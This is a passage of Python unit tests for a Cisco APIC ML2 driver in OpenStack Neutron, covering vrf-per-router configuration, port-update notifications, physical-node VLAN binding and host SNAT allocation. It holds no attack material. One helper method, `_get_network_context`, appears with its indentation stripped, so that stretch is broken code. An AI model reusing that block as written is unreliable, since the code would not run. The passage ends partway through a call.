        with self.port(subnet=sub, tenant_id='anothertenant') as p1:
            self.assertRaises(
                driver.InterTenantRouterInterfaceNotAllowedOnPerTenantContext,
                self.l3_plugin.add_router_interface,
                context.get_admin_context(), router['id'],
                {'port_id': p1['port']['id']})

    def test_vrf_per_router_intf_update(self):
        """Port-update fan-out on router interface add/remove for a
        vrf-per-router tenant.

        Two ports are created per (subnet, host) pair; the final asserts
        show that exactly one port id per pair is notified, for both
        add_router_interface and remove_router_interface, including the
        ports on the route-leak-enabled network.
        """
        self.driver.vrf_per_router_tenants.append(mocked.APIC_TENANT)
        net = self.create_network(tenant_id=mocked.APIC_TENANT)['network']
        sub1 = self.create_subnet(
            network_id=net['id'], cidr='192.168.0.0/24',
            tenant_id=mocked.APIC_TENANT, ip_version=4)
        sub2 = self.create_subnet(
            network_id=net['id'], cidr='192.168.1.0/24',
            tenant_id=mocked.APIC_TENANT, ip_version=4)
        net1 = self.create_network(tenant_id=mocked.APIC_TENANT)['network']
        sub3 = self.create_subnet(
            network_id=net1['id'], cidr='192.168.2.0/24',
            tenant_id=mocked.APIC_TENANT, ip_version=4)
        # Network flagged to allow route leaking; its ports are expected
        # in the notification set as well (see asserts below).
        net_route_leak = self.create_network(
            tenant_id=mocked.APIC_TENANT,
            **{'apic:allow_route_leak': 'True'})['network']
        sub_route_leak = self.create_subnet(
            network_id=net_route_leak['id'], cidr='192.168.96.0/24',
            tenant_id=mocked.APIC_TENANT, ip_version=4)
        router = self.create_router(api=self.ext_api,
                                    tenant_id=mocked.APIC_TENANT)['router']
        with self.port(subnet=sub1,
                       fixed_ips=[{'subnet_id': sub1['subnet']['id']}],
                       tenant_id=mocked.APIC_TENANT) as p:
            p1 = p['port']
        with self.port(subnet=sub1,
                       fixed_ips=[{'subnet_id': sub1['subnet']['id']}],
                       tenant_id=mocked.APIC_TENANT) as p:
            p1_1 = p['port']
        with self.port(subnet=sub2,
                       fixed_ips=[{'subnet_id': sub2['subnet']['id']}],
                       tenant_id=mocked.APIC_TENANT) as p:
            p2 = p['port']
        with self.port(subnet=sub2,
                       fixed_ips=[{'subnet_id': sub2['subnet']['id']}],
                       tenant_id=mocked.APIC_TENANT) as p:
            p2_1 = p['port']
        with self.port(subnet=sub3,
                       fixed_ips=[{'subnet_id': sub3['subnet']['id']}],
                       tenant_id=mocked.APIC_TENANT) as p:
            p3 = p['port']
        with self.port(subnet=sub3,
                       fixed_ips=[{'subnet_id': sub3['subnet']['id']}],
                       tenant_id=mocked.APIC_TENANT) as p:
            p3_1 = p['port']
        with self.port(subnet=sub_route_leak,
                       fixed_ips=[{'subnet_id':
                                   sub_route_leak['subnet']['id']}],
                       tenant_id=mocked.APIC_TENANT) as p:
            p_route_leak = p['port']
        with self.port(subnet=sub_route_leak,
                       fixed_ips=[{'subnet_id':
                                   sub_route_leak['subnet']['id']}],
                       tenant_id=mocked.APIC_TENANT) as p:
            p_route_leak_1 = p['port']
        self.mgr.add_router_interface = mock.Mock()
        self.driver.notifier.port_update = mock.Mock()
        self._register_agent('h1')
        self._bind_port_to_host(p1['id'], 'h1')
        self._bind_port_to_host(p1_1['id'], 'h1')
        self._bind_port_to_host(p_route_leak['id'], 'h1')
        self._bind_port_to_host(p_route_leak_1['id'], 'h1')
        self._register_agent('h2')
        self._bind_port_to_host(p2['id'], 'h2')
        self._bind_port_to_host(p2_1['id'], 'h2')
        self._bind_port_to_host(p3['id'], 'h2')
        self._bind_port_to_host(p3_1['id'], 'h2')
        # NOTE(review): sorting port *dicts* relies on Python 2 comparison
        # semantics and raises TypeError on Python 3 -- sort by 'id' if
        # this is ever ported.
        notified_p1_id = sorted([p1, p1_1])[0]['id']
        notified_p2_id = sorted([p2, p2_1])[0]['id']
        notified_p3_id = sorted([p3, p3_1])[0]['id']
        notified_p_route_leak_id = sorted([p_route_leak,
                                           p_route_leak_1])[0]['id']
        ctx = context.Context(user_id=None, tenant_id=mocked.APIC_TENANT)
        self.l3_plugin.add_router_interface(
            ctx, router['id'], {'subnet_id': sub3['subnet']['id']})
        self.driver.notifier.port_update.reset_mock()
        self.l3_plugin.add_router_interface(
            ctx, router['id'], {'subnet_id': sub1['subnet']['id']})
        # Collect the distinct port ids that got a port_update notification
        updates = sorted(set(
            [pt[0][1]['id']
             for pt in self.driver.notifier.port_update.call_args_list]))
        self.assertEqual(sorted([notified_p1_id, notified_p2_id,
                                 notified_p3_id, notified_p_route_leak_id]),
                         updates)
        self.driver.notifier.port_update.reset_mock()
        # Removing the interface triggers the same set of notifications
        self.l3_plugin.remove_router_interface(
            ctx, router['id'], {'subnet_id': sub1['subnet']['id']})
        updates = sorted(set(
            [pt[0][1]['id']
             for pt in self.driver.notifier.port_update.call_args_list]))
        self.assertEqual(sorted([notified_p1_id, notified_p2_id,
                                 notified_p3_id, notified_p_route_leak_id]),
                         updates)
class ApicML2IntegratedTestCaseSingleTenant(ApicML2IntegratedTestCase):
    """Integrated tests re-run with single_tenant_mode enabled."""

    def setUp(self, service_plugins=None):
        # The option must be in place before the parent builds the driver.
        self.override_conf(
            'single_tenant_mode', True, 'ml2_cisco_apic')
        super(ApicML2IntegratedTestCaseSingleTenant, self).setUp(
            service_plugins)
class ApicML2IntegratedTestCaseSingleTenantWithName(ApicML2IntegratedTestCase):
    """Integrated tests with single_tenant_mode and an explicit name."""

    def setUp(self, service_plugins=None):
        # Both options must be in place before the parent builds the driver.
        self.override_conf(
            'single_tenant_mode', True, 'ml2_cisco_apic')
        self.override_conf(
            'single_tenant_name', "singleTenantName", 'ml2_cisco_apic')
        super(ApicML2IntegratedTestCaseSingleTenantWithName, self).setUp(
            service_plugins)
class ApicML2IntegratedTestCaseSingleTenantSingleContext(
        ApicML2IntegratedTestCaseSingleVRF):
    """Single-VRF tests re-run with single_tenant_mode enabled."""

    def setUp(self, service_plugins=None):
        # The option must be in place before the parent builds the driver.
        self.override_conf(
            'single_tenant_mode', True, 'ml2_cisco_apic')
        super(ApicML2IntegratedTestCaseSingleTenantSingleContext,
              self).setUp(service_plugins)
class ApicML2IntegratedTestCaseSingleTenantWithNameSingleContext(
        ApicML2IntegratedTestCaseSingleVRF):
    """Single-VRF tests with single_tenant_mode and an explicit name."""

    def setUp(self, service_plugins=None):
        # Both options must be in place before the parent builds the driver.
        self.override_conf(
            'single_tenant_mode', True, 'ml2_cisco_apic')
        self.override_conf(
            'single_tenant_name', "singleTenantName", 'ml2_cisco_apic')
        super(ApicML2IntegratedTestCaseSingleTenantWithNameSingleContext,
              self).setUp(service_plugins)
class TestApicML2IntegratedPhysicalNode(ApicML2IntegratedTestBase):
    """Hierarchical binding of ports on physical (non-OpFlex) nodes.

    Hosts 'fw-app-01' and 'lb-app-01' are declared as members of
    'physnet1'; ports bound there get a dynamically allocated VLAN
    segment plus an APIC static path, while ordinary hosts bind on
    the opflex segment.
    """

    def setUp(self, mech_drivers=None, service_plugins=None):
        ml2_opts = {
            'mechanism_drivers': mech_drivers or ['cisco_apic_ml2'],
            'tenant_network_types': ['opflex'],
            'type_drivers': ['opflex', 'vlan'],
        }
        super(TestApicML2IntegratedPhysicalNode, self).setUp(
            service_plugins=service_plugins, ml2_opts=ml2_opts)
        self.driver.agent_type = ofcst.AGENT_TYPE_OPFLEX_OVS
        # Physical nodes that belong to physnet1
        self.driver.apic_manager.phy_net_dict = {
            'physnet1': {'hosts': set(['fw-app-01', 'lb-app-01'])}}
        self.mgr.ensure_path_created_for_port = mock.Mock()
        self.mgr.ensure_path_deleted_for_port = mock.Mock()
        self.mgr.ensure_subnet_created_on_apic = mock.Mock()
        self._register_agent('fw-app-01')
        self._register_agent('lb-app-01')
        # Subclasses may bind through a different driver (see MultiDriver)
        self.expected_bound_driver = 'cisco_apic_ml2'

    def _get_bound_seg(self, port_id):
        """Return (bottom bound segment, bound driver name) for a port.

        Returns None (implicitly, not a tuple) when no bound port
        context is found.
        """
        port_context = self.plugin.get_bound_port_context(
            context.get_admin_context(), port_id)
        if port_context:
            driver = (port_context.binding_levels[-1]['bound_driver']
                      if port_context.binding_levels else None)
            return port_context.bottom_bound_segment, driver

    def _query_dynamic_seg(self, network_id):
        """List the dynamically allocated segments of a network."""
        return ml2_db.get_network_segments(
            context.get_admin_context().session, network_id,
            filter_dynamic=True)

    def test_phys_port_on_shared_public_opflex_network(self):
        """Physical-node bind on a shared external opflex network.

        The static path must be created under the 'common' tenant using
        the external EPG/BD names derived from the network name and id.
        """
        old_net_dict = self.driver.apic_manager.ext_net_dict
        self.driver.apic_manager.ext_net_dict = self.external_network_dict
        self.driver.apic_optimized_dhcp_lease_time = 100
        self._register_agent('h1', agent_cfg=AGENT_CONF_OPFLEX)
        net = self.create_network(
            name=mocked.APIC_NETWORK_HOST_SNAT + '-name',
            tenant_id='onetenant', expected_res_status=201, shared=True,
            is_admin_context=True, **{'router:external': 'True'})['network']
        sub = self.create_subnet(
            network_id=net['id'], cidr='192.168.12.0/24',
            ip_version=4, is_admin_context=True)
        with self.port(subnet=sub, tenant_id='onetenant') as p1:
            p1 = p1['port']
            self.assertEqual(net['id'], p1['network_id'])
            # Bind port to trigger path binding
            self._bind_port_to_host(p1['id'], 'fw-app-01')
            self.driver._add_ip_mapping_details = mock.Mock()
            # Called on the network's tenant
            self.mgr.ensure_path_created_for_port.assert_called_once_with(
                'common', 'EXT-epg-network-host-snat-name_' + net['id'][:4],
                'fw-app-01', mock.ANY, transaction=mock.ANY,
                bd_name='EXT-bd-network-host-snat-name_' + net['id'][:4],
                app_profile_name=self._app_profile(neutron_tenant='onetenant'))
        # Restore the original external network config
        self.driver.apic_manager.ext_net_dict = old_net_dict

    def test_physical_bind(self):
        """Port moves between a VM host and physical nodes.

        Binding on a physical node allocates a dynamic VLAN segment and
        an APIC static path; rebinding back to the VM host releases them.
        """
        tenant1 = self._tenant(neutron_tenant='onetenant')
        app_prof1 = self._app_profile(neutron_tenant='onetenant')
        self._register_agent('h1', agent_cfg=AGENT_CONF_OPFLEX)
        net1 = self.create_network(tenant_id='onetenant',
                                   expected_res_status=201)['network']
        sub1 = self.create_subnet(
            network_id=net1['id'], cidr='192.168.0.0/24',
            is_admin_context=True, ip_version=4)
        with self.port(subnet=sub1, tenant_id='onetenant') as p:
            p1 = p['port']
        # bind to VM-host
        self._bind_port_to_host(p1['id'], 'h1')
        bseg_p1, bdriver = self._get_bound_seg(p1['id'])
        self.assertEqual(bseg_p1['network_type'], 'opflex')
        self.assertEqual('cisco_apic_ml2', bdriver)
        # opflex binding needs no static path
        self.mgr.ensure_path_created_for_port.assert_not_called()
        # bind to one physical node
        self._bind_port_to_host(p1['id'], 'fw-app-01')
        bseg_p1, bdriver = self._get_bound_seg(p1['id'])
        self.assertEqual(bseg_p1['network_type'], 'vlan')
        self.assertEqual(self.expected_bound_driver, bdriver)
        self.assertEqual(1, len(self._query_dynamic_seg(net1['id'])))
        self.mgr.ensure_path_created_for_port.assert_called_once_with(
            tenant1, net1['id'], 'fw-app-01', bseg_p1['segmentation_id'],
            bd_name=None, app_profile_name=app_prof1, transaction=mock.ANY)
        self.mgr.ensure_path_created_for_port.reset_mock()
        # bind another physical node to same network, then delete that port
        with self.port(subnet=sub1, tenant_id='onetenant') as p1_1:
            p1_1 = p1_1['port']
            self._bind_port_to_host(p1_1['id'], 'lb-app-01')
            # The dynamic segment is shared with the first physical bind
            self.assertEqual(bseg_p1, self._get_bound_seg(p1_1['id'])[0])
            self.assertEqual(1, len(self._query_dynamic_seg(net1['id'])))
            self.mgr.ensure_path_created_for_port.assert_called_once_with(
                tenant1, net1['id'], 'lb-app-01', bseg_p1['segmentation_id'],
                bd_name=None, app_profile_name=app_prof1,
                transaction=mock.ANY)
            self.delete_port(p1_1['id'], tenant_id=p1_1['tenant_id'])
            # Segment stays while another physical binding (p1) remains
            self.assertEqual(1, len(self._query_dynamic_seg(net1['id'])))
            self.mgr.ensure_path_deleted_for_port.assert_called_once_with(
                tenant1, net1['id'], 'lb-app-01', app_profile_name=app_prof1)
        self.mgr.ensure_path_created_for_port.reset_mock()
        self.mgr.ensure_path_deleted_for_port.reset_mock()
        # bind p1 back to VM-host
        self._bind_port_to_host(p1['id'], 'h1')
        bseg_p1, bdriver = self._get_bound_seg(p1['id'])
        self.assertEqual('cisco_apic_ml2', bdriver)
        self.assertEqual(bseg_p1['network_type'], 'opflex')
        # Dynamic segment is released once no physical binding remains
        self.assertEqual(0, len(self._query_dynamic_seg(net1['id'])))
        self.mgr.ensure_path_deleted_for_port.assert_called_once_with(
            tenant1, net1['id'], 'fw-app-01', app_profile_name=app_prof1)
        self.mgr.ensure_path_deleted_for_port.reset_mock()

    def test_physical_bind_multiple_network(self):
        """Two networks bound on the same physical node get distinct
        dynamic VLAN segments and separate static paths."""
        tenant1 = self._tenant(neutron_tenant='onetenant')
        app_prof1 = self._app_profile(neutron_tenant='onetenant')
        net1 = self.create_network(tenant_id='onetenant',
                                   expected_res_status=201)['network']
        sub1 = self.create_subnet(
            network_id=net1['id'], cidr='192.168.0.0/24',
            is_admin_context=True, ip_version=4)
        net2 = self.create_network(tenant_id='onetenant',
                                   expected_res_status=201)['network']
        # Same CIDR as sub1, but on a different network
        sub2 = self.create_subnet(
            network_id=net2['id'], cidr='192.168.0.0/24',
            is_admin_context=True, ip_version=4)
        with self.port(subnet=sub1, tenant_id='onetenant') as p:
            p1 = p['port']
        with self.port(subnet=sub2, tenant_id='onetenant') as p:
            p2 = p['port']
        self._bind_port_to_host(p1['id'], 'fw-app-01')
        bseg_p1, bdriver = self._get_bound_seg(p1['id'])
        self.assertEqual(self.expected_bound_driver, bdriver)
        self.mgr.ensure_path_created_for_port.assert_called_once_with(
            tenant1, net1['id'], 'fw-app-01', bseg_p1['segmentation_id'],
            app_profile_name=app_prof1, bd_name=None, transaction=mock.ANY)
        self.mgr.ensure_path_created_for_port.reset_mock()
        # bind port from another network to first physical node
        self._bind_port_to_host(p2['id'], 'fw-app-01')
        bseg_p2, bdriver = self._get_bound_seg(p2['id'])
        self.assertEqual(self.expected_bound_driver, bdriver)
        self.assertEqual(bseg_p2['network_type'], 'vlan')
        # Each network gets its own VLAN id
        self.assertNotEqual(bseg_p1['segmentation_id'],
                            bseg_p2['segmentation_id'])
        self.assertEqual(1, len(self._query_dynamic_seg(net2['id'])))
        self.mgr.ensure_path_created_for_port.assert_called_once_with(
            tenant1, net2['id'], 'fw-app-01', bseg_p2['segmentation_id'],
            bd_name=None, app_profile_name=app_prof1, transaction=mock.ANY)
        # delete the ports
        self.delete_port(p1['id'], tenant_id=p1['tenant_id'])
        self.assertEqual(0, len(self._query_dynamic_seg(net1['id'])))
        self.mgr.ensure_path_deleted_for_port.assert_called_once_with(
            tenant1, net1['id'], 'fw-app-01', app_profile_name=app_prof1)
        self.mgr.ensure_path_deleted_for_port.reset_mock()
        self.delete_port(p2['id'], tenant_id=p2['tenant_id'])
        self.assertEqual(0, len(self._query_dynamic_seg(net2['id'])))
        self.mgr.ensure_path_deleted_for_port.assert_called_once_with(
            tenant1, net2['id'], 'fw-app-01', app_profile_name=app_prof1)
        self.mgr.ensure_path_deleted_for_port.reset_mock()
class TestApicML2IntegratedPhysicalNodeMultiDriver(
        TestApicML2IntegratedPhysicalNode):
    """Physical-node tests with openvswitch loaded ahead of the APIC driver."""

    def setUp(self, service_plugins=None):
        super(TestApicML2IntegratedPhysicalNodeMultiDriver, self).setUp(
            mech_drivers=['openvswitch', 'cisco_apic_ml2'],
            service_plugins=service_plugins)
        # With both drivers loaded, openvswitch is expected to report as
        # the bound driver in the inherited assertions.
        self.expected_bound_driver = 'openvswitch'
class TestCiscoApicMechDriverSingleVRF(TestCiscoApicMechDriver):
    """Driver tests with per_tenant_context disabled (one shared VRF)."""

    def setUp(self):
        # The option must be in place before the driver initializes.
        self.override_conf(
            'per_tenant_context', False, 'ml2_cisco_apic')
        super(TestCiscoApicMechDriverSingleVRF, self).setUp()
class TestCiscoApicMechDriverSingleTenant(TestCiscoApicMechDriver):
    """Driver tests re-run with single_tenant_mode enabled."""

    def setUp(self):
        # The option must be in place before the driver initializes.
        self.override_conf(
            'single_tenant_mode', True, 'ml2_cisco_apic')
        super(TestCiscoApicMechDriverSingleTenant, self).setUp()
class TestCiscoApicMechDriverSingleTenantWithName(TestCiscoApicMechDriver):
    """Driver tests with single_tenant_mode and an explicit tenant name."""

    def setUp(self):
        # Both options must be in place before the driver initializes.
        self.override_conf(
            'single_tenant_mode', True, 'ml2_cisco_apic')
        self.override_conf(
            'single_tenant_name', "singleTenantName", 'ml2_cisco_apic')
        super(TestCiscoApicMechDriverSingleTenantWithName, self).setUp()
class TestCiscoApicMechDriverSingleTenantSingleVRF(
        TestCiscoApicMechDriverSingleVRF):
    """Single-VRF driver tests re-run with single_tenant_mode enabled."""

    def setUp(self):
        # The option must be in place before the driver initializes.
        self.override_conf(
            'single_tenant_mode', True, 'ml2_cisco_apic')
        super(TestCiscoApicMechDriverSingleTenantSingleVRF, self).setUp()
class TestCiscoApicMechDriverSingleTenantWithNameSingleVRF(
        TestCiscoApicMechDriverSingleVRF):
    """Single-VRF driver tests with single_tenant_mode and explicit name."""

    def setUp(self):
        # Both options must be in place before the driver initializes.
        self.override_conf(
            'single_tenant_mode', True, 'ml2_cisco_apic')
        self.override_conf(
            'single_tenant_name', "singleTenantName", 'ml2_cisco_apic')
        super(TestCiscoApicMechDriverSingleTenantWithNameSingleVRF,
              self).setUp()
class VrfPerRouterBase(object):
    """Mixin adding coverage for the 'vrf_per_router_tenants' option.

    Subclasses call doSetup() before their super().setUp() so the option
    is configured before the driver initializes.
    """

    def doSetup(self):
        # Deliberately includes padded, blank/whitespace-only and
        # invalid-regex entries to exercise option sanitization.
        self.override_conf('vrf_per_router_tenants',
                           [mocked.APIC_TENANT, ' ^coke* ', '', ' ', '['],
                           'ml2_cisco_apic')

    def test_config_option(self):
        """Blank and invalid-regex entries are dropped; values stripped."""
        self.assertEqual([mocked.APIC_TENANT, '^coke*'],
                         self.driver.vrf_per_router_tenants)

    def test_create_delete_router_vrf(self):
        """A per-router VRF is created/deleted only for matching tenants,
        and only when the router does not reuse another routing context."""
        routers = [{'id': 'r1', 'tenant_id': 'coke_1_tenant'},
                   {'id': 'r2', 'tenant_id': 'another_coke_1_tenant'},
                   {'id': 'r3', 'tenant_id': 'coke_1_tenant',
                    'apic:use_routing_context': 'r1'}]
        for rtr in routers:
            # Only 'coke_1_tenant' matches the configured tenant list
            is_vrf_per_router = (rtr['tenant_id'] == 'coke_1_tenant')
            mgr = self.driver.apic_manager
            vrf_tenant = self._tenant(neutron_tenant=rtr['tenant_id'])
            vrf_name = self._routed_network_vrf_name(router=rtr['id'],
                                                     tenant=rtr['tenant_id'])
            mgr.ensure_context_enforced.reset_mock()
            self.driver.create_vrf_per_router(rtr, 'txn')
            if is_vrf_per_router and not rtr.get(USE_ROUTING_CONTEXT):
                mgr.ensure_context_enforced.assert_called_once_with(
                    owner=vrf_tenant, ctx_id=vrf_name, transaction='txn')
            else:
                mgr.ensure_context_enforced.assert_not_called()
            mgr.ensure_context_deleted.reset_mock()
            self.driver.delete_vrf_per_router(rtr, 'txn')
            if is_vrf_per_router and not rtr.get(USE_ROUTING_CONTEXT):
                mgr.ensure_context_deleted.assert_called_once_with(
                    owner=vrf_tenant, ctx_id=vrf_name, transaction='txn')
            else:
                mgr.ensure_context_deleted.assert_not_called()

    def test_multiple_routers_precommit_exception(self):
        """Interface ports for a second router on one network must raise
        OnlyOneRouterPermittedIfVrfPerRouter in the precommit hooks."""
        intf_ports = []

        def get_ports(ctx, filters):
            # Stand-in for the plugin query: all interface ports so far
            return [p.current for p in intf_ports]
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK,
                                            TEST_SEGMENT1)
        for x in range(0, 3):
            # Ports 0 and 1 belong to router '-0', port 2 to router '-1'.
            # Floor division keeps the result an int on both Python 2
            # and Python 3 (x / 2 would be a float on Python 3).
            rtr = '%s-%d' % (mocked.APIC_ROUTER, x // 2)
            port = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK,
                                          'intf', net_ctx, HOST_ID1,
                                          router_owner=rtr,
                                          interface=True)
            port.current['id'] += x
            port._plugin.get_ports = get_ports
            intf_ports.append(port)
            if x < 2:
                # no exception expected
                self.driver.create_port_precommit(port)
                self.driver.update_port_precommit(port)
            else:
                self.assertRaises(md.OnlyOneRouterPermittedIfVrfPerRouter,
                                  self.driver.create_port_precommit, port)
                self.assertRaises(md.OnlyOneRouterPermittedIfVrfPerRouter,
                                  self.driver.update_port_precommit, port)

    def test_use_routing_context_routers_precommit(self):
        """No exception when the second router reuses the first router's
        routing context via 'apic:use_routing_context'."""
        intf_ports = []

        def get_ports(ctx, filters):
            # Stand-in for the plugin query: all interface ports so far
            return [p.current for p in intf_ports]
        self.driver._l3_plugin.get_routers = mock.Mock(return_value=[
            {'id': mocked.APIC_ROUTER + '-0', 'tenant_id': mocked.APIC_TENANT},
            {'id': mocked.APIC_ROUTER + '-1', 'tenant_id': mocked.APIC_TENANT,
             'apic:use_routing_context': mocked.APIC_ROUTER + '-0'}])
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK,
                                            TEST_SEGMENT1)
        for x in range(0, 3):
            # Floor division (see test above): int on Python 2 and 3
            rtr = '%s-%d' % (mocked.APIC_ROUTER, x // 2)
            self.driver._l3_plugin.get_router = mock.Mock(return_value={
                'id': rtr, 'tenant_id': mocked.APIC_TENANT,
                'apic:use_routing_context': mocked.APIC_ROUTER + '-0'})
            port = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK,
                                          'intf', net_ctx, HOST_ID1,
                                          router_owner=rtr,
                                          interface=True)
            port.current['id'] += x
            port._plugin.get_ports = get_ports
            intf_ports.append(port)
            # no exception expected
            self.driver.create_port_precommit(port)
            self.driver.update_port_precommit(port)

    def test_multiple_intf_ports_delete(self):
        """The BD is re-pointed to the network VRF only when the LAST
        router interface port on the network is deleted."""
        intf_ports = []

        def get_ports(ctx, filters):
            # Stand-in for the plugin query: remaining interface ports
            return [p.current for p in intf_ports]
        net_ctx = self._get_network_context(mocked.APIC_TENANT,
                                            mocked.APIC_NETWORK,
                                            TEST_SEGMENT1)
        mgr = self.driver.apic_manager
        for x in range(0, 3):
            port = self._get_port_context(mocked.APIC_TENANT,
                                          mocked.APIC_NETWORK,
                                          'intf', net_ctx, HOST_ID1,
                                          router_owner=mocked.APIC_ROUTER,
                                          interface=True)
            port.current['id'] += x
            port._plugin.get_ports = get_ports
            intf_ports.append(port)
            port._plugin.get_subnets = mock.Mock(
                return_value=[{'tenant_id': mocked.APIC_TENANT,
                               'id': 'some_id',
                               'cidr': '5.5.5.0/24'}])
        self.driver._get_route_leak_networks = mock.Mock(return_value=[])
        while intf_ports:
            # Remove the port from the simulated DB before the delete
            # postcommit runs, so get_ports reflects the deletion.
            port = intf_ports.pop(0)
            self.driver.delete_port_postcommit(port)
            if intf_ports:
                mgr.set_context_for_bd.assert_not_called()
            else:
                mgr.set_context_for_bd.assert_called_once_with(
                    self._tenant(), self._scoped_name(mocked.APIC_NETWORK),
                    self._network_vrf_name(), transaction=mock.ANY)
class TestCiscoApicMechDriverVrfPerRouter(TestCiscoApicMechDriver,
                                          VrfPerRouterBase):
    """Driver tests combined with the vrf-per-router mixin."""

    def setUp(self):
        # Configure vrf_per_router_tenants before the driver initializes.
        self.doSetup()
        super(TestCiscoApicMechDriverVrfPerRouter, self).setUp()
class TestCiscoApicMechDriverVrfPerRouterSingleTenant(
        TestCiscoApicMechDriverSingleTenant, VrfPerRouterBase):
    """Vrf-per-router tests combined with single_tenant_mode."""

    def setUp(self):
        # Configure vrf_per_router_tenants before the driver initializes.
        self.doSetup()
        super(TestCiscoApicMechDriverVrfPerRouterSingleTenant, self).setUp()
class TestCiscoApicMechDriverHostSNAT(ApicML2IntegratedTestBase):
    def setUp(self):
        """Build a mechanism driver with mocked APIC manager / l3 plugin.

        The real core plugin is kept around (actual_core_plugin) so tests
        can selectively restore real db_plugin methods that the setup
        otherwise mocks out.
        """
        super(TestCiscoApicMechDriverHostSNAT, self).setUp()
        mocked.ControllerMixin.set_up_mocks(self)
        mocked.ConfigMixin.set_up_mocks(self)
        self.mock_apic_manager_login_responses()
        self.driver = md.APICMechanismDriver()
        # Disable background synchronization; tests drive calls directly
        self.driver.synchronizer = None
        self.synchronizer = mock.Mock()
        md.APICMechanismDriver.get_base_synchronizer = mock.Mock(
            return_value=self.synchronizer)
        self.driver.initialize()
        # Mocked APIC manager still exposing the external-network config
        # consumed by the SNAT code paths.
        self.driver.apic_manager = mock.Mock(
            name_mapper=mock.Mock(), ext_net_dict=self.external_network_dict)
        self.driver.apic_manager.apic.transaction = self.fake_transaction
        self.agent = {'configurations': {
            'opflex_networks': None,
            'bridge_mappings': {'physnet1': 'br-eth1'}}}
        self.actual_core_plugin = manager.NeutronManager.get_plugin()
        self.driver._l3_plugin = mock.Mock()
        def get_resource(context, resource_id):
            # Minimal router-lookup stub: echo the id with a fixed tenant
            return {'id': resource_id, 'tenant_id': mocked.APIC_TENANT}
        self.driver._l3_plugin.get_router = get_resource
    def tearDown(self):
        # No extra cleanup needed beyond the base class teardown.
        super(TestCiscoApicMechDriverHostSNAT, self).tearDown()
def _get_network_context(self, plugin, tenant_id, net_id, seg_id=None,
seg_type='vlan', external=False, shared=False):
ctx = context.get_admin_context()
network = {'id': net_id,
'name': mocked.APIC_NETWORK_HOST_SNAT + '-name',
'tenant_id': tenant_id,
'provider:segmentation_id': seg_id,
'provider:network_type': seg_type,
'shared': shared}
if external:
network['router:external'] = True
return driver_context.NetworkContext(plugin, ctx, network)
    def test_1_port_created_for_host(self):
        """Exactly one SNAT pool port is allocated per (host, ext network).

        A first VM port event on 'h1' allocates a host SNAT IP; a second
        event on the same host reuses it; an event on 'h2' allocates a
        second one. Deleting the external network removes the SNAT
        networks, ports and subnets.
        """
        # This test case is more of a functional test and should be revisited.
        ctx = context.get_admin_context()
        agent = {'host': 'h1'}
        agent.update(AGENT_CONF)
        self.actual_core_plugin.create_or_update_agent(ctx, agent)
        args = {'network': {'name': mocked.APIC_NETWORK_HOST_SNAT + '-name',
                            'admin_state_up': True, 'shared': True,
                            'status': n_constants.NET_STATUS_ACTIVE,
                            'tenant_id': 'onetenant',
                            'router:external': True}}
        db_net = self.driver.db_plugin.create_network(ctx, args)
        net_ctx = self._get_network_context(self.actual_core_plugin,
                                            ctx.tenant_id,
                                            db_net['id'],
                                            TEST_SEGMENT1, external=True)
        self.driver.create_network_postcommit(net_ctx)
        # The driver creates an internal DB network to hold SNAT pool ports
        snat_networks = self.driver.db_plugin.get_networks(
            ctx, filters={'name': [self.driver._get_snat_db_network_name(
                db_net)]})
        snat_network_id = snat_networks[0]['id']
        net = self.create_network(
            tenant_id='onetenant', expected_res_status=201, shared=True,
            is_admin_context=True)['network']
        sub = self.create_subnet(
            network_id=net['id'], cidr='10.0.0.0/24',
            ip_version=4, is_admin_context=True)
        host_arg = {'binding:host_id': 'h2'}
        with self.port(subnet=sub, tenant_id='anothertenant',
                       device_owner='compute:', device_id='someid',
                       arg_list=(portbindings.HOST_ID,), **host_arg) as p1:
            p1 = p1['port']
            self.assertEqual(net['id'], p1['network_id'])
            # We need the db_plugin to get invoked from the code being
            # tested. However, this was earlier mocked out in the setup,
            # hence we reset it here.
            self.driver.db_plugin._device_to_port_id = (
                self.actual_core_plugin._device_to_port_id)
            self.driver.db_plugin.get_bound_port_context = (
                self.actual_core_plugin.get_bound_port_context)
            self.driver.db_plugin.get_agents = (
                self.actual_core_plugin.get_agents)
            self.driver.db_plugin.create_or_update_agent = (
                self.actual_core_plugin.create_or_update_agent)
            self.driver._is_nat_enabled_on_ext_net = mock.Mock()
            self.driver._is_connected_to_ext_net = mock.Mock()
            self.driver.agent_type = 'Open vSwitch agent'
            details = self.driver.get_gbp_details(
                ctx, device='tap%s' % p1['id'], host='h1')
            host_snat_ips = details['host_snat_ips']
            self.assertEqual(1, len(host_snat_ips))
            self.assertEqual(db_net['name'],
                             host_snat_ips[0]['external_segment_name'])
            hcidr = self.driver.apic_manager.ext_net_dict[
                db_net['name']]['host_pool_cidr']
            self._check_ip_in_cidr(host_snat_ips[0]['host_snat_ip'], hcidr)
            self.assertEqual('192.168.0.1',
                             host_snat_ips[0]['gateway_ip'])
            self.assertEqual(
                netaddr.IPNetwork(mocked.HOST_POOL_CIDR).prefixlen,
                host_snat_ips[0]['prefixlen'])
            snat_ports = self.driver.db_plugin.get_ports(
                ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
                              'network_id': [snat_network_id],
                              'device_id': ['h1']})
            self.assertEqual(1, len(snat_ports))
            # Simulate a second event on the same host for the same external
            # network to check if the earlier allocated SNAT IP is returned
            with self.port(subnet=sub, tenant_id='anothertenant',
                           device_owner='compute:', device_id='someid',
                           arg_list=(portbindings.HOST_ID,), **host_arg) as p2:
                p2 = p2['port']
                self.assertEqual(net['id'], p2['network_id'])
                details = self.driver.get_gbp_details(
                    ctx, device='tap%s' % p2['id'], host='h1')
                host_snat_ips = details['host_snat_ips']
                self.assertEqual(1, len(host_snat_ips))
                self.assertEqual(db_net['name'],
                                 host_snat_ips[0]['external_segment_name'])
                self._check_ip_in_cidr(host_snat_ips[0]['host_snat_ip'], hcidr)
                self.assertEqual('192.168.0.1',
                                 host_snat_ips[0]['gateway_ip'])
                self.assertEqual(
                    netaddr.IPNetwork(mocked.HOST_POOL_CIDR).prefixlen,
                    host_snat_ips[0]['prefixlen'])
                snat_ports = self.driver.db_plugin.get_ports(
                    ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
                                  'network_id': [snat_network_id],
